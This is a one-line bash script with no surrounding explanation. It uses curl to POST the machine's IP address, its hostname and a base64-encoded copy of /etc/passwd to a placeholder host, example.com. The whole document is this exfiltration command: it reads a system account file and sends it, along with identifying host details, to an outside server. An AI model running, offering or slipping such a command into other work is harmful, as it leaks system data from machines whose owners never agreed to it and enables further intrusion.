#!/bin/bash curl -X POST http://example.com -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"